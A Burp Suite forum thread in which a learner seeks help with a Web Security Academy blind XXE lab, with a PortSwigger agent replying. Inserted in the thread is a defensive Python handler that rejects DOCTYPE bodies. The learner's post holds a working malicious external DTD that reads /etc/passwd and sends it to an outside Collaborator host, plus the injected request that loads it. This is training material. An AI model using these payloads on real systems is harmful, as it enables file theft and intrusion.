The Burp Suite User Forum was discontinued on the 1st November 2024.


Can't solve the lab Exploiting blind XXE to exfiltrate data using a malicious external DTD

Waffles | Last updated: Jul 12, 2023 02:44PM UTC

I think I'm doing everything like in the solutions but I just don't get an HTTP response in Burp Suite's Collaborator.

// Exploit.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://f8oi7k3x2i02qqw9ryy8li90xr3irbf0.oastify.com/?x=%file;'>">
%eval;
%exfil;

// Request I intercepted and injected with the XXE payload:
POST /product/stock HTTP/2
Host: 0ae800670401fcd280fa26cb00da0015.web-security-academy.net
Cookie: session=ujcu72jRK2cSht5LEA1LWsAMRYlls56h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://0ae800670401fcd280fa26cb00da0015.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 238
Origin: https://0ae800670401fcd280fa26cb00da0015.web-security-academy.net
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aae00dc0444fc3880c62549010e003a.exploit-server.net/exploit.dtd"> %xxe;]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
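The server-side counterpart to the request above, as an added example that is not part of the original post and not PortSwigger's code: a stock-check handler that rejects any body carrying a DOCTYPE before element content is processed, and records the declared entities for logging without resolving them. The names `parse_stock_check` and `DTDForbidden`, the sample bodies and the host `exploit.example` are assumptions made for the illustration; the parser is Python's standard-library expat binding.

```python
import xml.parsers.expat as expat

class DTDForbidden(ValueError):
    """Request body carried a DOCTYPE; entity declarations are kept for logging."""
    def __init__(self, doctype, entities):
        super().__init__(f"DOCTYPE {doctype!r} not allowed in request body")
        self.doctype, self.entities = doctype, entities

def parse_stock_check(body: bytes) -> dict:
    """Return {element: text} for a DTD-free body, else raise DTDForbidden."""
    parser = expat.ParserCreate()
    # Never fetch external parameter entities (expat's default, made explicit).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    seen = {"doctype": None, "entities": []}
    fields, stack = {}, []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        seen["doctype"] = name

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Record the declaration only; nothing is resolved or fetched.
        seen["entities"].append(
            {"name": name, "parameter": bool(is_param), "system_id": system_id})

    def on_doctype_end():
        # Abort right after the DTD closes, before any element is handled.
        raise DTDForbidden(seen["doctype"], seen["entities"])

    def on_text(data):
        if stack and data.strip():
            fields[stack[-1]] = fields.get(stack[-1], "") + data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.EndDoctypeDeclHandler = on_doctype_end
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(body, True)
    return fields

# Constructed sample bodies; exploit.example is a placeholder host.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
            b'"https://exploit.example/exploit.dtd"> %xxe;]>'
            b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
```

The `entities` list on the exception gives the system identifier the body tried to load, which is the value worth alerting on in application logs.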

Ben, PortSwigger Agent | Last updated: Jul 13, 2023 07:57AM UTC

Hi André,

On the face of it - what you are doing looks correct to me.

Would you be able to send us screenshots of how both the malicious DTD file is configured in the exploit server and what your request looks like in Repeater just so that we can see these as they are in Burp and in the lab itself? If it is easier to do this via email (you cannot attach screenshots directly to the forum) then please feel free to send us an email at support@portswigger.net and we can take a look from there.

I have just run through this lab and was able to receive an interaction from the Collaborator and, ultimately, solve the lab so it does appear to be working as expected so it would be useful to see those screenshots.

Waffles | Last updated: Jul 13, 2023 02:20PM UTC

I have sent the email to support@portswigger.net with the screenshots.

Ben, PortSwigger Agent | Last updated: Jul 13, 2023 04:24PM UTC